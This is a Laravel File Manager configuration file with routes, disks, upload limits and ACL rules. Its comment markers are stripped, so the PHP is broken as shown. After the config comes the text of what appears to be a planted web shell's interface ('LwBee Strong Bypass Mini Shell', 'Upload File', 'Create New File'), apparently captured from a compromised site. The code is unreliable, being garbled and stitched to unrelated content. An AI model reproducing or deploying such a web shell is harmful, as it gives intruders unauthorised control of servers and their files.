
use Alexusmai\LaravelFileManager\Services\ConfigService\DefaultConfigRepository;
use Alexusmai\LaravelFileManager\Services\ACLService\ConfigACLRepository;

return [

     * Set Config repository
     * Default - DefaultConfigRepository get config from this file
    'configRepository' => DefaultConfigRepository::class,

     * ACL rules repository
     * Default - ConfigACLRepository (see rules in - aclRules)
    'aclRepository' => ConfigACLRepository::class,

    //********* Default configuration for DefaultConfigRepository **************

     * LFM Route prefix
     * !!! WARNING - if you change it, you should compile frontend with new prefix(baseUrl) !!!
    'routePrefix' => 'file-manager',

     * List of disk names that you want to use
     * (from config/filesystems)
    'diskList' => ['media','topics'],

     * Default disk for left manager
     * null - auto select the first disk in the disk list
    'leftDisk' => null,

     * Default disk for right manager
     * null - auto select the first disk in the disk list
    'rightDisk' => null,

     * Default path for left manager
     * null - root directory
    'leftPath' => null,

     * Default path for right manager
     * null - root directory
    'rightPath' => null,

     * Image cache ( Intervention Image Cache )
     * set null, 0 - if you don't need cache (default)
     * if you want use cache - set the number of minutes for which the value should be cached
    'cache' => null,

     * File manager modules configuration
     * 1 - only one file manager window
     * 2 - one file manager window with directories tree module
     * 3 - two file manager windows
    'windowsConfig' => 2,

     * File upload - Max file size in KB
     * null - no restrictions
    'maxUploadFileSize' => null,

     * File upload - Allow these file types
     * [] - no restrictions
    'allowFileTypes' => [],

     * Show / Hide system files and folders
    'hiddenFiles' => true,

     * Middleware
     * Add your middleware name to array -> ['web', 'auth', 'admin']
    'middleware' => ['auth'],

     * ACL mechanism ON/OFF
     * default - false(OFF)
    'acl' => false,

     * Hide files and folders from file-manager if user doesn't have access
     * ACL access level = 0
    'aclHideFromFM' => true,

     * ACL strategy
     * blacklist - Allow everything(access - 2 - r/w) that is not forbidden by the ACL rules list
     * whitelist - Deny anything(access - 0 - deny), that not allowed by the ACL rules list
    'aclStrategy' => 'blacklist',

     * ACL Rules cache
     * null or value in minutes
    'aclRulesCache' => null,

    //********* Default configuration for DefaultConfigRepository END **********

     * ACL rules list - used for default ACL repository (ConfigACLRepository)
     * 1 it's user ID
     * null - for not authenticated user
     * 'disk' => 'disk-name'
     * 'path' => 'folder-name'
     * 'path' => 'folder1*' - select folder1, folder12, folder1/sub-folder, ...
     * 'path' => 'folder2/*' - select folder2/sub-folder,... but not select folder2 !!!
     * 'path' => 'folder-name/file-name.jpg'
     * 'path' => 'folder-name/*.jpg'
     * * - wildcard
     * access: 0 - deny, 1 - read, 2 - read/write
    'aclRules' => [
        null => [
            //['disk' => 'public', 'path' => '/', 'access' => 2],
        1 => [
            //['disk' => 'public', 'path' => 'images/arch*.jpg', 'access' => 2],
            //['disk' => 'public', 'path' => 'files/*', 'access' => 1],
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File